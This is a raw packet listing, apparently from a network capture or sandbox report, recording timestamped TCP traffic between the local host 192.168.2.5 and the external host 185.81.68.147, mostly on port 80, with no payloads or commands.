Dec 13, 2024 01:37:35.884660959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884684086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884700060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884720087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884746075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884759903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884783983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884798050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884819031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884841919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884855032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884876966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884891987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884908915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884968042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.884999037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885015011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885039091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885054111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885081053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885097027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885118961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885132074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885153055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885171890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885195017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885207891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885229111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885241985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885268927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885282040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885406017 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.885464907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885481119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885505915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885525942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885549068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885562897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885579109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885595083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885622025 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885642052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885652065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885668993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885685921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885711908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885729074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885756969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885771990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885788918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885816097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885829926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885853052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885867119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885893106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885915995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885931015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885951996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885966063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.885987043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886010885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886024952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886049032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886064053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886168957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886193991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886209011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886226892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886240959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886267900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886291027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886305094 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886327028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886341095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886406898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886430979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886452913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886466980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886485100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886498928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886526108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886540890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886594057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886624098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886637926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886658907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886674881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886696100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886709929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886729002 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886751890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886769056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886790991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886804104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886825085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886843920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886868000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886883020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886907101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886920929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886945963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886960030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886981964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.886997938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887022972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887041092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887068033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887136936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887136936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887152910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887182951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887198925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887219906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887233973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887254953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887270927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887295961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887310982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887330055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887345076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887368917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887389898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887403965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887422085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887435913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887468100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887481928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887645006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887676001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887691021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887723923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887737989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887759924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887774944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887795925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887814045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887835979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887854099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887873888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887887955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887916088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887932062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887955904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887969971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.887991905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888006926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888029099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888044119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888061047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888075113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888099909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888118982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888142109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888159037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888175011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888200998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888214111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888236046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888248920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888274908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888300896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888324976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888338089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888354063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888371944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888400078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888422012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888443947 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888463974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888485909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888513088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888530016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888550043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888571978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888586998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888612986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888725042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888742924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888766050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888780117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888809919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888832092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888858080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888873100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888897896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888923883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888950109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888968945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.888992071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889007092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889035940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889055967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889074087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889089108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889112949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889141083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889163971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889179945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889205933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889219999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889295101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889329910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889343977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889365911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889379978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889411926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889426947 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889481068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889516115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889539957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889574051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889592886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889616013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889630079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889662981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889725924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889754057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889767885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889791965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889806032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889834881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889853954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889877081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889892101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889918089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.889941931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.890002966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.890029907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.890043974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.901534081 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.901693106 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.901738882 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.901753902 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902086973 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902123928 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902148962 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902159929 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902267933 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902276993 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902286053 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902295113 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902302980 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902311087 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902319908 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902328968 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902337074 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902740955 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902761936 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902770042 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902776957 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902785063 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902792931 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902820110 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902832985 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902842045 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902863026 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902899027 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902945042 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.902992964 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.903002977 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.903009892 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.903044939 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.903057098 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.903064013 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.903083086 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.903090954 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.903177023 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.903186083 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.903192997 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.903203011 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.913530111 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.913670063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.913698912 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.913729906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.913755894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.913755894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.913755894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.913773060 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.913789988 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.913794041 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.913805962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.913824081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.913827896 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.913836956 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.913842916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.913867950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.913882971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.913901091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.913932085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.913950920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.913968086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.913970947 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.913980007 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.913986921 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.913988113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.914004087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.914019108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.914036989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.914056063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.914067030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.914088964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.914103031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.914141893 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914150953 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914170027 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914177895 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914304018 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914330006 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914359093 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914366961 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914437056 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914458036 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914473057 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914606094 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914649010 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914657116 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914735079 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914849043 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914858103 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914865017 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914890051 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914900064 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914916992 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.914931059 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.915010929 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.928869963 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.928958893 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929007053 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929076910 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929088116 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929099083 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929197073 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929209948 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929218054 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929236889 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929378033 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929385900 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929406881 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929415941 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929421902 CET	80	49775	185.81.68.147	192.168.2.5
